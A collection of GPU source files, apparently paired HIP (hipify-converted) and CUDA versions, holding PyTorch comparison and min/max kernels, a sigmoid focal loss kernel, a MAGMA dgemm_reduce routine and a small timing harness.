// !!! This is a file automatically generated by hipify!!! #include <ATen/AccumulateType.h> #include <ATen/Dispatch.h> #include <ATen/native/BinaryOps.h> #include <ATen/native/DispatchStub.h> #include <ATen/native/TensorIterator.h> #include <ATen/native/hip/Loops.cuh> #include <ATen/native/hip/zmath.cuh> // NOTE: CUDA on Windows requires that the enclosing function // of a __device__ lambda not have internal linkage. namespace at { namespace native { void lt_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "lt_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a < b; }); }); } void le_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "le_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a <= b; }); }); } void gt_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "gt_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a > b; }); }); } void ge_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "ge_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a >= b; }); }); } void eq_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND_COMPLEX_AND2(kHalf, kBool, iter.common_dtype(), "eq_cuda", [&]() { using thrust_t = typename ztype_cuda<scalar_t>::thrust_t; gpu_kernel_with_scalars(iter, []GPU_LAMBDA(thrust_t a, thrust_t b) -> bool { return a == b; }); }); } void ne_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND_COMPLEX_AND2(kHalf, kBool, iter.common_dtype(), "ne_cuda", [&]() { using thrust_t = typename ztype_cuda<scalar_t>::thrust_t; gpu_kernel_with_scalars(iter, []GPU_LAMBDA(thrust_t a, thrust_t b) -> bool { return a != b; }); }); } void max_elementwise_kernel_cuda(TensorIterator& iter) { if (iter.dtype() == ScalarType::Bool) { gpu_kernel(iter, []GPU_LAMBDA(bool a, bool b) -> bool { return a || b; }); } else if (isIntegralType(iter.dtype(), /*includeBool=*/ false)) { AT_DISPATCH_INTEGRAL_TYPES(iter.dtype(), "max_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { return ::max(a, b); }); }); } else { AT_DISPATCH_FLOATING_TYPES_AND_HALF(iter.dtype(), "max_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { // isnan(half) breaks the Windows build. We explicitly cast half to float. using acc_type = typename AccumulateType<scalar_t, /*is_cuda=*/true>::type; // We avoid using nan or nanf because we want to return the same type as scalar_t. if (::isnan(static_cast<acc_type>(a))) { return a; } else if (::isnan(static_cast<acc_type>(b))) { return b; } else { return ::max(a, b); } }); }); } } void min_elementwise_kernel_cuda(TensorIterator& iter) { if (iter.dtype() == ScalarType::Bool) { gpu_kernel(iter, []GPU_LAMBDA(bool a, bool b) -> bool { return a && b; }); } else if (isIntegralType(iter.dtype(), /*includeBool=*/ false)) { AT_DISPATCH_INTEGRAL_TYPES(iter.dtype(), "min_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { return ::min(a, b); }); }); } else { AT_DISPATCH_FLOATING_TYPES_AND_HALF(iter.dtype(), "min_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { // isnan(half) breaks the Windows build. We explicitly cast half to float. using acc_type = typename AccumulateType<scalar_t, /*is_cuda=*/true>::type; // We avoid using nan or nanf because we want to return the same type as scalar_t. if (::isnan(static_cast<acc_type>(a))) { return a; } else if (::isnan(static_cast<acc_type>(b))) { return b; } else { return ::min(a, b); } }); }); } } REGISTER_DISPATCH(lt_stub, &lt_kernel_cuda); REGISTER_DISPATCH(le_stub, &le_kernel_cuda); REGISTER_DISPATCH(gt_stub, &gt_kernel_cuda); REGISTER_DISPATCH(ge_stub, &ge_kernel_cuda); REGISTER_DISPATCH(eq_stub, &eq_kernel_cuda); REGISTER_DISPATCH(ne_stub, &ne_kernel_cuda); REGISTER_DISPATCH(max_elementwise_stub, &max_elementwise_kernel_cuda); REGISTER_DISPATCH(min_elementwise_stub, &min_elementwise_kernel_cuda); }} // namespace at::native
4635c217850a2677bcccfc05c6966018029a2443.cu
#include <ATen/AccumulateType.h> #include <ATen/Dispatch.h> #include <ATen/native/BinaryOps.h> #include <ATen/native/DispatchStub.h> #include <ATen/native/TensorIterator.h> #include <ATen/native/cuda/Loops.cuh> #include <ATen/native/cuda/zmath.cuh> // NOTE: CUDA on Windows requires that the enclosing function // of a __device__ lambda not have internal linkage. namespace at { namespace native { void lt_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "lt_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a < b; }); }); } void le_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "le_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a <= b; }); }); } void gt_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "gt_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a > b; }); }); } void ge_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND2(kHalf, kBool, iter.common_dtype(), "ge_cuda", [&]() { gpu_kernel_with_scalars(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> bool { return a >= b; }); }); } void eq_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND_COMPLEX_AND2(kHalf, kBool, iter.common_dtype(), "eq_cuda", [&]() { using thrust_t = typename ztype_cuda<scalar_t>::thrust_t; gpu_kernel_with_scalars(iter, []GPU_LAMBDA(thrust_t a, thrust_t b) -> bool { return a == b; }); }); } void ne_kernel_cuda(TensorIterator& iter) { AT_DISPATCH_ALL_TYPES_AND_COMPLEX_AND2(kHalf, kBool, iter.common_dtype(), "ne_cuda", [&]() { using thrust_t = typename ztype_cuda<scalar_t>::thrust_t; gpu_kernel_with_scalars(iter, []GPU_LAMBDA(thrust_t a, thrust_t b) -> bool { return a != b; }); }); } void max_elementwise_kernel_cuda(TensorIterator& iter) { if (iter.dtype() == ScalarType::Bool) { gpu_kernel(iter, []GPU_LAMBDA(bool a, bool b) -> bool { return a || b; }); } else if (isIntegralType(iter.dtype(), /*includeBool=*/ false)) { AT_DISPATCH_INTEGRAL_TYPES(iter.dtype(), "max_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { return ::max(a, b); }); }); } else { AT_DISPATCH_FLOATING_TYPES_AND_HALF(iter.dtype(), "max_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { // isnan(half) breaks the Windows build. We explicitly cast half to float. using acc_type = typename AccumulateType<scalar_t, /*is_cuda=*/true>::type; // We avoid using nan or nanf because we want to return the same type as scalar_t. if (::isnan(static_cast<acc_type>(a))) { return a; } else if (::isnan(static_cast<acc_type>(b))) { return b; } else { return ::max(a, b); } }); }); } } void min_elementwise_kernel_cuda(TensorIterator& iter) { if (iter.dtype() == ScalarType::Bool) { gpu_kernel(iter, []GPU_LAMBDA(bool a, bool b) -> bool { return a && b; }); } else if (isIntegralType(iter.dtype(), /*includeBool=*/ false)) { AT_DISPATCH_INTEGRAL_TYPES(iter.dtype(), "min_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { return ::min(a, b); }); }); } else { AT_DISPATCH_FLOATING_TYPES_AND_HALF(iter.dtype(), "min_elementwise_cuda", [&]() { gpu_kernel(iter, []GPU_LAMBDA(scalar_t a, scalar_t b) -> scalar_t { // isnan(half) breaks the Windows build. We explicitly cast half to float. using acc_type = typename AccumulateType<scalar_t, /*is_cuda=*/true>::type; // We avoid using nan or nanf because we want to return the same type as scalar_t. if (::isnan(static_cast<acc_type>(a))) { return a; } else if (::isnan(static_cast<acc_type>(b))) { return b; } else { return ::min(a, b); } }); }); } } REGISTER_DISPATCH(lt_stub, &lt_kernel_cuda); REGISTER_DISPATCH(le_stub, &le_kernel_cuda); REGISTER_DISPATCH(gt_stub, &gt_kernel_cuda); REGISTER_DISPATCH(ge_stub, &ge_kernel_cuda); REGISTER_DISPATCH(eq_stub, &eq_kernel_cuda); REGISTER_DISPATCH(ne_stub, &ne_kernel_cuda); REGISTER_DISPATCH(max_elementwise_stub, &max_elementwise_kernel_cuda); REGISTER_DISPATCH(min_elementwise_stub, &min_elementwise_kernel_cuda); }} // namespace at::native
0289c43274d8fa234690dd96c08ff210439a0278.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" // modified from // https://github.com/facebookresearch/maskrcnn-benchmark/blob/master/maskrcnn_benchmark/csrc/cuda/SigmoidFocalLoss_cuda.cu // Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. // This file is modified from // https://github.com/pytorch/pytorch/blob/master/modules/detectron/sigmoid_focal_loss_op.cu // Cheng-Yang Fu // [email protected] #include <ATen/ATen.h> #include <ATen/hip/HIPContext.h> #include <THH/THH.h> #include <THH/THHAtomics.cuh> #include <THH/THHDeviceUtils.cuh> #include <cfloat> // TODO make it in a common file #define CUDA_1D_KERNEL_LOOP(i, n) \ for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < n; \ i += blockDim.x * gridDim.x) template <typename scalar_t> __global__ void SigmoidFocalLossForward(const int nthreads, const scalar_t *logits, const int64_t *targets, const int num_classes, const float gamma, const float alpha, const int num, scalar_t *losses) { CUDA_1D_KERNEL_LOOP(i, nthreads) { int n = i / num_classes; int d = i % num_classes; // current class[0~79]; int t = targets[n]; // target class [0~79]; // Decide it is positive or negative case. scalar_t c1 = (t == d); scalar_t c2 = (t >= 0 & t != d); scalar_t zn = (1.0 - alpha); scalar_t zp = (alpha); // p = 1. / 1. + expf(-x); p = sigmoid(x) scalar_t p = 1. / (1. + expf(-logits[i])); // (1-p)**gamma * log(p) where scalar_t term1 = powf((1. - p), gamma) * logf(max(p, FLT_MIN)); // p**gamma * log(1-p) scalar_t term2 = powf(p, gamma) * (-1. * logits[i] * (logits[i] >= 0) - logf(1. + expf(logits[i] - 2. * logits[i] * (logits[i] >= 0)))); losses[i] = 0.0; losses[i] += -c1 * term1 * zp; losses[i] += -c2 * term2 * zn; } // CUDA_1D_KERNEL_LOOP } // SigmoidFocalLossForward template <typename scalar_t> __global__ void SigmoidFocalLossBackward( const int nthreads, const scalar_t *logits, const int64_t *targets, const scalar_t *d_losses, const int num_classes, const float gamma, const float alpha, const int num, scalar_t *d_logits) { CUDA_1D_KERNEL_LOOP(i, nthreads) { int n = i / num_classes; int d = i % num_classes; // current class[0~79]; int t = targets[n]; // target class [0~79], 80 is background; // Decide it is positive or negative case. scalar_t c1 = (t == d); scalar_t c2 = (t >= 0 & t != d); scalar_t zn = (1.0 - alpha); scalar_t zp = (alpha); // p = 1. / 1. + expf(-x); p = sigmoid(x) scalar_t p = 1. / (1. + expf(-logits[i])); // (1-p)**g * (1 - p - g*p*log(p) scalar_t term1 = powf((1. - p), gamma) * (1. - p - (p * gamma * logf(max(p, FLT_MIN)))); // (p**g) * (g*(1-p)*log(1-p) - p) scalar_t term2 = powf(p, gamma) * ((-1. * logits[i] * (logits[i] >= 0) - logf(1. + expf(logits[i] - 2. * logits[i] * (logits[i] >= 0)))) * (1. - p) * gamma - p); d_logits[i] = 0.0; d_logits[i] += -c1 * term1 * zp; d_logits[i] += -c2 * term2 * zn; d_logits[i] = d_logits[i] * d_losses[i]; } // CUDA_1D_KERNEL_LOOP } // SigmoidFocalLossBackward at::Tensor SigmoidFocalLoss_forward_cuda(const at::Tensor &logits, const at::Tensor &targets, const int num_classes, const float gamma, const float alpha) { AT_ASSERTM(logits.device().is_cuda(), "logits must be a CUDA tensor"); AT_ASSERTM(targets.device().is_cuda(), "targets must be a CUDA tensor"); AT_ASSERTM(logits.dim() == 2, "logits should be NxClass"); AT_ASSERTM(targets.max().item<int64_t>() <= (int64_t)num_classes, "target label should smaller or equal than num classes"); const int num_samples = logits.size(0); auto losses = at::empty({num_samples, logits.size(1)}, logits.options()); auto losses_size = num_samples * logits.size(1); dim3 grid( ::min(THCCeilDiv((int64_t)losses_size, (int64_t)512), (int64_t)4096)); dim3 block(512); if (losses.numel() == 0) { THCudaCheck(hipGetLastError()); return losses; } AT_DISPATCH_FLOATING_TYPES_AND_HALF( logits.scalar_type(), "SigmoidFocalLoss_forward", [&] { hipLaunchKernelGGL(( SigmoidFocalLossForward<scalar_t>) , dim3(grid), dim3(block), 0, at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), losses_size, logits.contiguous().data_ptr<scalar_t>(), targets.contiguous().data_ptr<int64_t>(), num_classes, gamma, alpha, num_samples, losses.data_ptr<scalar_t>()); }); THCudaCheck(hipGetLastError()); return losses; } at::Tensor SigmoidFocalLoss_backward_cuda(const at::Tensor &logits, const at::Tensor &targets, const at::Tensor &d_losses, const int num_classes, const float gamma, const float alpha) { AT_ASSERTM(logits.device().is_cuda(), "logits must be a CUDA tensor"); AT_ASSERTM(targets.device().is_cuda(), "targets must be a CUDA tensor"); AT_ASSERTM(d_losses.device().is_cuda(), "d_losses must be a CUDA tensor"); AT_ASSERTM(logits.dim() == 2, "logits should be NxClass"); const int num_samples = logits.size(0); AT_ASSERTM(logits.size(1) == num_classes, "logits.size(1) should be num_classes"); auto d_logits = at::zeros({num_samples, num_classes}, logits.options()); auto d_logits_size = num_samples * logits.size(1); dim3 grid(::min(THCCeilDiv((int64_t)d_logits_size, (int64_t)512), (int64_t)4096)); dim3 block(512); if (d_logits.numel() == 0) { THCudaCheck(hipGetLastError()); return d_logits; } AT_DISPATCH_FLOATING_TYPES_AND_HALF( logits.scalar_type(), "SigmoidFocalLoss_backward", [&] { hipLaunchKernelGGL(( SigmoidFocalLossBackward<scalar_t>) , dim3(grid), dim3(block), 0, at::hip::getCurrentHIPStreamMasqueradingAsCUDA(), d_logits_size, logits.contiguous().data_ptr<scalar_t>(), targets.contiguous().data_ptr<int64_t>(), d_losses.contiguous().data_ptr<scalar_t>(), num_classes, gamma, alpha, num_samples, d_logits.data_ptr<scalar_t>()); }); THCudaCheck(hipGetLastError()); return d_logits; }
0289c43274d8fa234690dd96c08ff210439a0278.cu
// modified from // https://github.com/facebookresearch/maskrcnn-benchmark/blob/master/maskrcnn_benchmark/csrc/cuda/SigmoidFocalLoss_cuda.cu // Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. // This file is modified from // https://github.com/pytorch/pytorch/blob/master/modules/detectron/sigmoid_focal_loss_op.cu // Cheng-Yang Fu // [email protected] #include <ATen/ATen.h> #include <ATen/cuda/CUDAContext.h> #include <THC/THC.h> #include <THC/THCAtomics.cuh> #include <THC/THCDeviceUtils.cuh> #include <cfloat> // TODO make it in a common file #define CUDA_1D_KERNEL_LOOP(i, n) \ for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < n; \ i += blockDim.x * gridDim.x) template <typename scalar_t> __global__ void SigmoidFocalLossForward(const int nthreads, const scalar_t *logits, const int64_t *targets, const int num_classes, const float gamma, const float alpha, const int num, scalar_t *losses) { CUDA_1D_KERNEL_LOOP(i, nthreads) { int n = i / num_classes; int d = i % num_classes; // current class[0~79]; int t = targets[n]; // target class [0~79]; // Decide it is positive or negative case. scalar_t c1 = (t == d); scalar_t c2 = (t >= 0 & t != d); scalar_t zn = (1.0 - alpha); scalar_t zp = (alpha); // p = 1. / 1. + expf(-x); p = sigmoid(x) scalar_t p = 1. / (1. + expf(-logits[i])); // (1-p)**gamma * log(p) where scalar_t term1 = powf((1. - p), gamma) * logf(max(p, FLT_MIN)); // p**gamma * log(1-p) scalar_t term2 = powf(p, gamma) * (-1. * logits[i] * (logits[i] >= 0) - logf(1. + expf(logits[i] - 2. * logits[i] * (logits[i] >= 0)))); losses[i] = 0.0; losses[i] += -c1 * term1 * zp; losses[i] += -c2 * term2 * zn; } // CUDA_1D_KERNEL_LOOP } // SigmoidFocalLossForward template <typename scalar_t> __global__ void SigmoidFocalLossBackward( const int nthreads, const scalar_t *logits, const int64_t *targets, const scalar_t *d_losses, const int num_classes, const float gamma, const float alpha, const int num, scalar_t *d_logits) { CUDA_1D_KERNEL_LOOP(i, nthreads) { int n = i / num_classes; int d = i % num_classes; // current class[0~79]; int t = targets[n]; // target class [0~79], 80 is background; // Decide it is positive or negative case. scalar_t c1 = (t == d); scalar_t c2 = (t >= 0 & t != d); scalar_t zn = (1.0 - alpha); scalar_t zp = (alpha); // p = 1. / 1. + expf(-x); p = sigmoid(x) scalar_t p = 1. / (1. + expf(-logits[i])); // (1-p)**g * (1 - p - g*p*log(p) scalar_t term1 = powf((1. - p), gamma) * (1. - p - (p * gamma * logf(max(p, FLT_MIN)))); // (p**g) * (g*(1-p)*log(1-p) - p) scalar_t term2 = powf(p, gamma) * ((-1. * logits[i] * (logits[i] >= 0) - logf(1. + expf(logits[i] - 2. * logits[i] * (logits[i] >= 0)))) * (1. - p) * gamma - p); d_logits[i] = 0.0; d_logits[i] += -c1 * term1 * zp; d_logits[i] += -c2 * term2 * zn; d_logits[i] = d_logits[i] * d_losses[i]; } // CUDA_1D_KERNEL_LOOP } // SigmoidFocalLossBackward at::Tensor SigmoidFocalLoss_forward_cuda(const at::Tensor &logits, const at::Tensor &targets, const int num_classes, const float gamma, const float alpha) { AT_ASSERTM(logits.device().is_cuda(), "logits must be a CUDA tensor"); AT_ASSERTM(targets.device().is_cuda(), "targets must be a CUDA tensor"); AT_ASSERTM(logits.dim() == 2, "logits should be NxClass"); AT_ASSERTM(targets.max().item<int64_t>() <= (int64_t)num_classes, "target label should smaller or equal than num classes"); const int num_samples = logits.size(0); auto losses = at::empty({num_samples, logits.size(1)}, logits.options()); auto losses_size = num_samples * logits.size(1); dim3 grid( std::min(THCCeilDiv((int64_t)losses_size, (int64_t)512), (int64_t)4096)); dim3 block(512); if (losses.numel() == 0) { THCudaCheck(cudaGetLastError()); return losses; } AT_DISPATCH_FLOATING_TYPES_AND_HALF( logits.scalar_type(), "SigmoidFocalLoss_forward", [&] { SigmoidFocalLossForward<scalar_t> <<<grid, block, 0, at::cuda::getCurrentCUDAStream()>>>( losses_size, logits.contiguous().data_ptr<scalar_t>(), targets.contiguous().data_ptr<int64_t>(), num_classes, gamma, alpha, num_samples, losses.data_ptr<scalar_t>()); }); THCudaCheck(cudaGetLastError()); return losses; } at::Tensor SigmoidFocalLoss_backward_cuda(const at::Tensor &logits, const at::Tensor &targets, const at::Tensor &d_losses, const int num_classes, const float gamma, const float alpha) { AT_ASSERTM(logits.device().is_cuda(), "logits must be a CUDA tensor"); AT_ASSERTM(targets.device().is_cuda(), "targets must be a CUDA tensor"); AT_ASSERTM(d_losses.device().is_cuda(), "d_losses must be a CUDA tensor"); AT_ASSERTM(logits.dim() == 2, "logits should be NxClass"); const int num_samples = logits.size(0); AT_ASSERTM(logits.size(1) == num_classes, "logits.size(1) should be num_classes"); auto d_logits = at::zeros({num_samples, num_classes}, logits.options()); auto d_logits_size = num_samples * logits.size(1); dim3 grid(std::min(THCCeilDiv((int64_t)d_logits_size, (int64_t)512), (int64_t)4096)); dim3 block(512); if (d_logits.numel() == 0) { THCudaCheck(cudaGetLastError()); return d_logits; } AT_DISPATCH_FLOATING_TYPES_AND_HALF( logits.scalar_type(), "SigmoidFocalLoss_backward", [&] { SigmoidFocalLossBackward<scalar_t> <<<grid, block, 0, at::cuda::getCurrentCUDAStream()>>>( d_logits_size, logits.contiguous().data_ptr<scalar_t>(), targets.contiguous().data_ptr<int64_t>(), d_losses.contiguous().data_ptr<scalar_t>(), num_classes, gamma, alpha, num_samples, d_logits.data_ptr<scalar_t>()); }); THCudaCheck(cudaGetLastError()); return d_logits; }
0ac833f77183acea92eb6274a5f8be73a6773c06.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* -- MAGMA (version 2.1.0) -- Univ. of Tennessee, Knoxville Univ. of California, Berkeley Univ. of Colorado, Denver @date August 2016 @generated from magmablas/zgemm_reduce.cu, normal z -> d, Tue Aug 30 09:38:28 2016 */ #include "magma_internal.h" #include "magma_templates.h" // size of work for a thread block #define BLK_M 16 #define BLK_N 16 // BLK_K gets defined in magmablas_dgemm_reduce, // because it depends on the CUDA architecture at runtime. /******************************************************************************/ // BLK_K size is templated, as it depends on CUDA architecture at runtime. // Hmm... how to compile for both CUDA arch 1.x and 2.x? template< int BLK_K > __global__ void dgemm_reduce_kernel( int m, int n, int k, double alpha, const double* __restrict__ dA, int lda, const double* __restrict__ dB, int ldb, double beta, double * __restrict__ dC, int ldc) { #if (__CUDA_ARCH__ >= 200) const int tx = threadIdx.x; if (blockIdx.x*BLK_M + threadIdx.y < m && blockIdx.y*BLK_N + threadIdx.z < n) { dA += (blockIdx.x*BLK_M + threadIdx.y) * lda; dB += (blockIdx.y*BLK_N + threadIdx.z) * ldb; dC += blockIdx.x*BLK_M + blockIdx.y*BLK_N * ldc; // was: sum[BLK_M][BLK_N+1][BLK_K+1]; // moved 3rd dimension to 1st dimension to make magma_sum_reduce_3d interface nicer. __shared__ double sum[BLK_K][BLK_M+1][BLK_N+1]; double lsum; /* w := v**H * C */ lsum = MAGMA_D_ZERO; for( int j = tx; j < k; j += BLK_K ) lsum += MAGMA_D_CONJ( dA[j] )* dB[j]; sum[tx][threadIdx.y][threadIdx.z] = lsum; magma_sum_reduce_3d< BLK_K, BLK_M+1, BLK_N+1 >( tx, threadIdx.y, threadIdx.z, sum ); /* C := C - v * w */ __syncthreads(); if (threadIdx.x == 0) { if (MAGMA_D_EQUAL(beta, MAGMA_D_ZERO)) dC[threadIdx.y + threadIdx.z*ldc] = alpha*sum[0][threadIdx.y][threadIdx.z]; else dC[threadIdx.y + threadIdx.z*ldc] = beta* dC[threadIdx.y + threadIdx.z*ldc] + alpha*sum[0][threadIdx.y][threadIdx.z]; } } #endif } /***************************************************************************//** Purpose ------- DGEMM_REDUCE performs one of the matrix-matrix operations C := alpha*A^T*B + beta*C, where alpha and beta are scalars, and A, B and C are matrices, with A a k-by-m matrix, B a k-by-n matrix, and C an m-by-n matrix. This routine is tuned for m, n << k. Typically, m and n are expected to be less than 128. @ingroup magma_gemm *******************************************************************************/ extern "C" void magmablas_dgemm_reduce_q( magma_int_t m, magma_int_t n, magma_int_t k, double alpha, magmaDouble_const_ptr dA, magma_int_t ldda, magmaDouble_const_ptr dB, magma_int_t lddb, double beta, magmaDouble_ptr dC, magma_int_t lddc, magma_queue_t queue ) { magma_int_t info = 0; if ( m < 0 ) info = -1; else if ( n < 0 ) info = -2; else if ( k < 0 ) info = -3; else if ( ldda < m ) info = -6; else if ( lddb < k ) info = -8; else if ( lddc < m ) info = -11; if (info != 0) { magma_xerbla( __func__, -(info) ); return; //info; } magma_int_t arch = magma_getdevice_arch(); if ( arch < 200 ) { // -------------------- // call CUDA ARCH 1.x -- maximum 512 threads const int NUM_THREADS = 512; const int BLK_K = (NUM_THREADS / (BLK_M * BLK_N)); // == 2 dim3 threads( BLK_K, BLK_M, BLK_N ); dim3 blocks( magma_ceildiv( m, BLK_M ), magma_ceildiv( n, BLK_N ), 1 ); hipLaunchKernelGGL(( dgemm_reduce_kernel<BLK_K>) , dim3(blocks), dim3(threads), 0, queue->cuda_stream() , m, n, k, alpha, dA, ldda, dB, lddb, beta, dC, lddc ); } else { // -------------------- // call CUDA ARCH 2.x -- maximum 1024 threads const int NUM_THREADS = 1024; const int BLK_K = (NUM_THREADS / (BLK_M * BLK_N)); // == 4 dim3 threads( BLK_K, BLK_M, BLK_N ); dim3 blocks( magma_ceildiv( m, BLK_M ), magma_ceildiv( n, BLK_N ), 1 ); hipLaunchKernelGGL(( dgemm_reduce_kernel<BLK_K>) , dim3(blocks), dim3(threads), 0, queue->cuda_stream() , m, n, k, alpha, dA, ldda, dB, lddb, beta, dC, lddc ); } }
0ac833f77183acea92eb6274a5f8be73a6773c06.cu
/* -- MAGMA (version 2.1.0) -- Univ. of Tennessee, Knoxville Univ. of California, Berkeley Univ. of Colorado, Denver @date August 2016 @generated from magmablas/zgemm_reduce.cu, normal z -> d, Tue Aug 30 09:38:28 2016 */ #include "magma_internal.h" #include "magma_templates.h" // size of work for a thread block #define BLK_M 16 #define BLK_N 16 // BLK_K gets defined in magmablas_dgemm_reduce, // because it depends on the CUDA architecture at runtime. /******************************************************************************/ // BLK_K size is templated, as it depends on CUDA architecture at runtime. // Hmm... how to compile for both CUDA arch 1.x and 2.x? template< int BLK_K > __global__ void dgemm_reduce_kernel( int m, int n, int k, double alpha, const double* __restrict__ dA, int lda, const double* __restrict__ dB, int ldb, double beta, double * __restrict__ dC, int ldc) { #if (__CUDA_ARCH__ >= 200) const int tx = threadIdx.x; if (blockIdx.x*BLK_M + threadIdx.y < m && blockIdx.y*BLK_N + threadIdx.z < n) { dA += (blockIdx.x*BLK_M + threadIdx.y) * lda; dB += (blockIdx.y*BLK_N + threadIdx.z) * ldb; dC += blockIdx.x*BLK_M + blockIdx.y*BLK_N * ldc; // was: sum[BLK_M][BLK_N+1][BLK_K+1]; // moved 3rd dimension to 1st dimension to make magma_sum_reduce_3d interface nicer. __shared__ double sum[BLK_K][BLK_M+1][BLK_N+1]; double lsum; /* w := v**H * C */ lsum = MAGMA_D_ZERO; for( int j = tx; j < k; j += BLK_K ) lsum += MAGMA_D_CONJ( dA[j] )* dB[j]; sum[tx][threadIdx.y][threadIdx.z] = lsum; magma_sum_reduce_3d< BLK_K, BLK_M+1, BLK_N+1 >( tx, threadIdx.y, threadIdx.z, sum ); /* C := C - v * w */ __syncthreads(); if (threadIdx.x == 0) { if (MAGMA_D_EQUAL(beta, MAGMA_D_ZERO)) dC[threadIdx.y + threadIdx.z*ldc] = alpha*sum[0][threadIdx.y][threadIdx.z]; else dC[threadIdx.y + threadIdx.z*ldc] = beta* dC[threadIdx.y + threadIdx.z*ldc] + alpha*sum[0][threadIdx.y][threadIdx.z]; } } #endif } /***************************************************************************//** Purpose ------- DGEMM_REDUCE performs one of the matrix-matrix operations C := alpha*A^T*B + beta*C, where alpha and beta are scalars, and A, B and C are matrices, with A a k-by-m matrix, B a k-by-n matrix, and C an m-by-n matrix. This routine is tuned for m, n << k. Typically, m and n are expected to be less than 128. @ingroup magma_gemm *******************************************************************************/ extern "C" void magmablas_dgemm_reduce_q( magma_int_t m, magma_int_t n, magma_int_t k, double alpha, magmaDouble_const_ptr dA, magma_int_t ldda, magmaDouble_const_ptr dB, magma_int_t lddb, double beta, magmaDouble_ptr dC, magma_int_t lddc, magma_queue_t queue ) { magma_int_t info = 0; if ( m < 0 ) info = -1; else if ( n < 0 ) info = -2; else if ( k < 0 ) info = -3; else if ( ldda < m ) info = -6; else if ( lddb < k ) info = -8; else if ( lddc < m ) info = -11; if (info != 0) { magma_xerbla( __func__, -(info) ); return; //info; } magma_int_t arch = magma_getdevice_arch(); if ( arch < 200 ) { // -------------------- // call CUDA ARCH 1.x -- maximum 512 threads const int NUM_THREADS = 512; const int BLK_K = (NUM_THREADS / (BLK_M * BLK_N)); // == 2 dim3 threads( BLK_K, BLK_M, BLK_N ); dim3 blocks( magma_ceildiv( m, BLK_M ), magma_ceildiv( n, BLK_N ), 1 ); dgemm_reduce_kernel<BLK_K> <<< blocks, threads, 0, queue->cuda_stream() >>> ( m, n, k, alpha, dA, ldda, dB, lddb, beta, dC, lddc ); } else { // -------------------- // call CUDA ARCH 2.x -- maximum 1024 threads const int NUM_THREADS = 1024; const int BLK_K = (NUM_THREADS / (BLK_M * BLK_N)); // == 4 dim3 threads( BLK_K, BLK_M, BLK_N ); dim3 blocks( magma_ceildiv( m, BLK_M ), magma_ceildiv( n, BLK_N ), 1 ); dgemm_reduce_kernel<BLK_K> <<< blocks, threads, 0, queue->cuda_stream() >>> ( m, n, k, alpha, dA, ldda, dB, lddb, beta, dC, lddc ); } }
1333508a9bb9ab4689605749d5bb01d1353e8911.hip
// !!! This is a file automatically generated by hipify!!! #include "mesh.h" #include "scattering.h" #include "potential.h" #include "computeTMatrix.h" #include "solveLS.h" #include <fstream> #include <iomanip> #include <hip/hip_runtime.h> #include <hip/hip_runtime.h> #include <hiprand/hiprand_kernel.h> #include <hip/hip_complex.h> #include <chrono> void datainsamling() { /* std::ofstream myfile; myfile.open("data.csv"); myfile << "Real av fasskift"; myfile << ","; myfile << "N"; myfile << "\n"; */ for (int i = 0; i < 5; i++) { using milli = std::chrono::microseconds; auto start = std::chrono::high_resolution_clock::now(); solveLS(); auto finish = std::chrono::high_resolution_clock::now(); std::cout << "myFunction() took " << std::chrono::duration_cast<milli>(finish - start).count() << " milliseconds\n"; } } int main() { datainsamling(); return 0; }
1333508a9bb9ab4689605749d5bb01d1353e8911.cu
